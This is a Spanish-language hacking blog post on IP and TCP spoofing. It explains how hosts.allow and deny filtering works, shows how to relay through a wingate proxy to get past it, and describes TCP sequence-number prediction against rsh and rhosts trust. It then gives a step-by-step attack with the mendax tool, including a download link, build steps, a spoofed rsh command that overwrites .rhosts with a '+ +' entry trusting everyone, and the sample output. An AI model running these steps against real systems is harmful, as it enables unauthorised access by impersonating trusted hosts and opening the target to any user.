----====SPOOFING====----Nro.1
Que es el Spoofing?
-------------------
El spoof tradicional es cuando los'atacantes' falsean el origen de los
paquetes haciendo que la victima piense que estos son de un host de confianza o autorizado
para saltar un firewall o que la victimas no nos detecten.
TCP y IP spoofing
------------------
Centremonos en Nuestro server (linux/unix/Bsb) que protege varios servicios al mismo tiempo
atravez de los ya conocidos Tcp Wrappers y con herramientas tipo Firewalls que protegen
toda una RED.
La mayoria de estas herramientas protege, comparando Host y IP y utilizandolos para identificarlos
por ejemplo los archivos /etc/host.allow y /etc/host.deny.
/etc/host.allow
(supongamos que es una red local y yo 192.168.0.1 soy el server y nada mas quiero
que ellos usen mis servicios)
AllowHosts
caos.ezkracho.com.ar,192.168.0.2
kuazar.ezkracho.com.ar,192.168.0.3
bach.ezkracho.com.ar,192.168.0.4
giba.ezkracho.com.ar,192.168.0.5
hellraiser.ezkracho.com.ar,192.168.0.6
/etc/host.deny
(estos son los que no quiero que usen mis servicios)
DenyHosts
gerente.ezkracho.com.ar, 192.168.0.7
cinic.ezkracho.com.ar, 192.168.0.8
sperman.ezkracho.com.ar, 192.168.0.9
pero tambien se pueden poner rangos de ip tipo 200.0.212.* o 200.*.*.*
Vamos a un caso de spoof basico
-------------------------------
Supongamos bach.ezkracho.com.ar esta corriendo un NT server con wingate y cinic.ezkracho.com.ar
que quiere entrar a mi server, pero no tiene acceso a mi server, entonces cinic hace:
$telnet 192.168.0.4 23
wingate>192.168.0.1 21...conected
200 Ezkracho Server (wu-ftp 6.9) on host powertech.ezkracho.com.ar
---------------
Bienvenido Ezkracho Server
---------------
ftp>user ftp
331 Anonymous access allowed, send identity (e-mail name) as password
pass email@email.com
230 Anonymous user logged in.
0-----0
Ataque Spoof de numeros secuenciales
----------------------------------
Tenemos un Webserver y tenemos al CLASICO atacante, vamos a dar el servicio rhosts que
es un buen ejemplo porque rhosts hace una conexion de confiansa entre dos makinas porque
tiene 'autentificacion remota'rlogin,rsh,rcp y rcmp porque los usuarios que tienen acceso a estos
servicios son confiados y estan autorizados a entrar a: systema local sin passwd
un ejemplo del archivo .rhosts
node1.ezkracho.com.ar caos
node2.ezkracho.com.ar kuazar
node3.ezkracho.com.ar giba
node4.ezkracho.com.ar bach
node5.ezkracho.com.ar hellraiser
Cuando el circuito virtual esta establecido,los dos hosts tienen que tener iguales
maneras de verificacion que los datos sean transferidos limpiamente.
Por esto TCP usa en (ingles) sequence numbers. TCP le asigna a cada paquete un numero como
index identificatorio. Los dos hosts usan este numero para chequear errores y reportarlos. Es
mas, este proceso de pasar los numeros secuenciales cuando el circuito ya esta establecido.
El siguiente articulo fue escrito por Rik Farrow que explica el sistema de numeros secuenciales.
La secuencia es usada para aceptar los datos que llegan. Al principio de la conección, el cliente
que manda los paquetes TCP con un numero en secuencia inicial, pero no certificada (no puede haber
una ahora). Si la aplicacion del server esta corriendo del otro lado de la coneccion, el server
manda de vuelta el paquete con su propia inical de numero secuencial desde el paquete del cliente mas
uno. Cuando el sistema cliente resive este paquete, lo debe mandar de vuelta con su propia
confirmacion: el numero inicial del server mas uno.
El atacante tiene dos problemas el primero es cambiar la direccion y la otra es mantenerla secuencia en el
dialogo con la makina victima, el segundo es el mas complica el ataque ya que el numero secuencial ya
que el cambio del mismo no es arbitrario.
Si el atacante adivina correctamente el numero, este puede sincronisarse con la victima y iniciar
una sesinon. Desde ahora la makina del atacante quedavinculada a la makina victima como un host de
confiansa, y puede iniciar conecciones tipo rhosts asi pude logearse.
Un caso de ataque secuencial
-----------------------------
Aplicacion:mendax para linux
lenuage:c
http://esperosun.chungnam.ac.kr/-jmkim/hacking/1997/11/mendax_linux.tgz
Para usarlo tenemos que hacer
gunzip mendax_linux.tgz
tar -xvf mandax_linux.tar
make
./mendax
estas son las opciones
-p Port
-s Port
-l Username
-r Username
-c command
-w Port
-d
-t
-L TERM
-S PORT
ahora mi objetivo es ejecutar el comando rsh desde 192.168.0.8 a 192.168.0.1 spoofeando me por
192.168.0.2 ,el commando que quiero ejecutar es:
mv .rhosts .r; echo + + > .rhosts
para spoofearme
[root@gerente]# mendax -p 514 192.168.0.2 192.168.0.1 -l caos -r caos
Flooding sourse con TCP SYN packets from 192.168.0.8
samplin secuense numbers
seq number: 816640001, ack number: 64001 difference:64000
seq number: 816640001, ack number: 128001 difference:64000
seq number: 816640001, ack number: 192001 difference:64000
using 64000 as prediction difference (3 hits)
spoofing rshd
reseting TCP target connection:
reseting source: ..............
[root@gerente]#
para ver si funciono
ls -l .r*
-rw-r--r-- 1 caos user fecha .rhosts
el archivo rhosts tiene que tener en el ++
y deaspues en el log aparece
fecha gnss rshd: caos@192.168.0.2
SPOOFING
Posted by kasp3r11
15:38, under hacking |